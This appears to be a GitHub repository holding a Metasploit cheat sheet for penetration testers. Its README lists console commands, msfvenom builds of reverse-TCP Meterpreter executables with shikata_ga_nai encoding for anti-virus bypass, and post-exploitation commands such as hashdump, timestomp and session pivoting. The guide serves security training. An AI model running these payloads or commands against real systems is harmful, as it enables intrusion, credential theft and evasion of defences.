├── image
├── rapid7.png
└── metasploit.png
├── .gitignore
├── .github
└── FUNDING.yml
├── LICENSE
└── README.md
/image/rapid7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/security-cheatsheet/metasploit-cheat-sheet/HEAD/image/rapid7.png
--------------------------------------------------------------------------------
/image/metasploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/security-cheatsheet/metasploit-cheat-sheet/HEAD/image/metasploit.png
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Node rules:
2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
3 | .grunt
4 |
5 | ## Dependency directory
6 | ## Commenting this out is preferred by some people, see
7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
8 | node_modules
9 |
10 | # Book build output
11 | _book
12 |
13 | # eBook build output
14 | *.epub
15 | *.mobi
16 | *.pdf
17 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: ismailtasdelen
4 | patreon: ismailtasdelen
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: ismailtasdelen
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 İsmail Taşdelen
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | #### Metasploit Cheat Sheet
2 |
3 |
4 | 
5 |
6 |
7 | The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
8 |
9 | Metasploit is a popular tool used by pentest experts. I have prepared a document for you to learn.
10 |
11 | #### Metasploit :
12 |
13 | ###### Search for module:
14 |
15 | ```
16 | msf > search [regex]
17 | ```
18 |
19 | ###### Specify and exploit to use:
20 |
21 | ```
22 | msf > use exploit/[ExploitPath]
23 | ```
24 |
25 | ###### Specify a Payload to use:
26 |
27 | ```
28 | msf > set PAYLOAD [PayloadPath]
29 | ```
30 |
31 | ###### Show options for the current modules:
32 |
33 | ```
34 | msf > show options
35 | ```
36 |
37 | ###### Set options:
38 |
39 | ```
40 | msf > set [Option] [Value]
41 | ```
42 |
43 | ###### Start exploit:
44 |
45 | ```
46 | msf > exploit
47 | ```
48 |
49 | ##### Useful Auxiliary Modules
50 |
51 |
52 | ###### Port Scanner:
53 |
54 | ```
55 | msf > use auxiliary/scanner/portscan/tcp
56 | msf > set RHOSTS 10.10.10.0/24
57 | msf > run
58 | ```
59 |
60 | ###### DNS Enumeration:
61 |
62 | ```
63 | msf > use auxiliary/gather/dns_enum
64 | msf > set DOMAIN target.tgt
65 | msf > run
66 | ```
67 |
68 | ###### FTP Server:
69 |
70 | ```
71 | msf > use auxiliary/server/ftp
72 | msf > set FTPROOT /tmp/ftproot
73 | msf > run
74 | ```
75 |
76 | ###### Proxy Server:
77 |
78 | ```
79 | msf > use auxiliary/server/socks4
80 | msf > run
81 | ```
82 |
83 | #### msfvenom :
84 |
85 | The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode
86 | them. This tool replaces the former msfpayload and msfencode tools. Run with ‘'-l payloads’ to get a list of payloads.
87 |
88 | ```
89 | $ msfvenom –p [PayloadPath]
90 | –f [FormatType]
91 | LHOST=[LocalHost (if reverse conn.)]
92 | LPORT=[LocalPort]
93 | ```
94 |
95 | Example :
96 |
97 | Reverse Meterpreter payload as an executable and redirected into a file:
98 |
99 | ```
100 | $ msfvenom -p windows/meterpreter/
101 | reverse_tcp -f exe LHOST=10.1.1.1
102 | LPORT=4444 > met.exe
103 | ```
104 |
105 | Format Options (specified with –f) --help-formats – List available output formats
106 |
107 | exe – Executable
108 | pl – Perl
109 | rb – Ruby
110 | raw – Raw shellcode
111 | c – C code
112 |
113 | Encoding Payloads with msfvenom
114 |
115 | The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders'
116 | to get a list of encoders.
117 |
118 | ```
119 | $ msfvenom -p [Payload] -e [Encoder] -f
120 | [FormatType] -i [EncodeInterations]
121 | LHOST=[LocalHost (if reverse conn.)]
122 | LPORT=[LocalPort]
123 | ```
124 |
125 | Example
126 |
127 | Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
128 |
129 | ```
130 | $ msfvenom -p windows/meterpreter/
131 | reverse_tcp -i 5 -e x86/shikata_ga_nai -f
132 | exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
133 | ```
134 |
135 | ##### Metasploit Meterpreter
136 |
137 | ###### Base Commands:
138 |
139 | ? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
140 |
141 | sysinfo: Show the system name and OS type
142 |
143 | shutdown / reboot: Self-explanatory
144 |
145 | File System Commands:
146 |
147 | cd: Change directory
148 |
149 | lcd: Change directory on local (attacker's) machine
150 |
151 | pwd / getwd: Display current working directory
152 |
153 | ls: Show the contents of the directory
154 |
155 | cat: Display the contents of a file on screen
156 |
157 | download / upload: Move files to/from the target machine
158 |
159 | mkdir / rmdir: Make / remove directory
160 |
161 | edit: Open a file in the default editor (typically vi)
162 |
163 | Process Commands:
164 |
165 | getpid: Display the process ID that Meterpreter is running inside.
166 |
167 | getuid: Display the user ID that Meterpreter is running with.
168 |
169 | ps: Display process list.
170 |
171 | kill: Terminate a process given its process ID.
172 |
173 | execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
174 |
175 | migrate: Jump to a given destination process ID
176 |
177 | - Target process must have same or lesser privileges
178 |
179 | - Target process may be a more stable process
180 |
181 | - When inside a process, can access any files that process has a lock on.
182 |
183 | ###### Network Commands:
184 |
185 | ipconfig: Show network interface information
186 |
187 | portfwd: Forward packets through TCP session
188 |
189 | route: Manage/view the system's routing table
190 |
191 | ###### Misc Commands:
192 |
193 | idletime: Display the duration that the GUI of thetarget machine has been idle.
194 |
195 | uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
196 |
197 | screenshot: Save as an image a screenshot of the target machine.
198 |
199 | ###### Additional Modules:
200 |
201 | use [module]: Load the specified module
202 |
203 | Example:
204 |
205 | use priv: Load the priv module
206 |
207 | hashdump: Dump the hashes from the box
208 |
209 | timestomp:Alter NTFS file timestamps
210 |
211 | ##### Managing Sessions
212 |
213 | ###### Multiple Exploitation:
214 |
215 | Run the exploit expecting a single session that is immediately backgrounded:
216 |
217 | ```
218 | msf > exploit -z
219 | ```
220 |
221 | Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
222 |
223 | ```
224 | msf > exploit –j
225 | ```
226 |
227 | ###### List all current jobs (usually exploit listeners):
228 |
229 | ```
230 | msf > jobs –l
231 | ```
232 |
233 | ###### Kill a job:
234 |
235 | ```
236 | msf > jobs –k [JobID]
237 | ```
238 |
239 | ##### Multiple Sessions:
240 |
241 | ###### List all backgrounded sessions:
242 |
243 | ```
244 | msf > sessions -l
245 | ```
246 |
247 | ###### Interact with a backgrounded session:
248 |
249 | ```
250 | msf > session -i [SessionID]
251 | ```
252 |
253 | ###### Background the current interactive session:
254 |
255 | ```
256 | meterpreter >
257 | or
258 | meterpreter > background
259 | ```
260 |
261 | ###### Routing Through Sessions:
262 |
263 | All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
264 |
265 | ```
266 | msf > route add [Subnet to Route To]
267 | [Subnet Netmask] [SessionID]
268 | ```
269 |
--------------------------------------------------------------------------------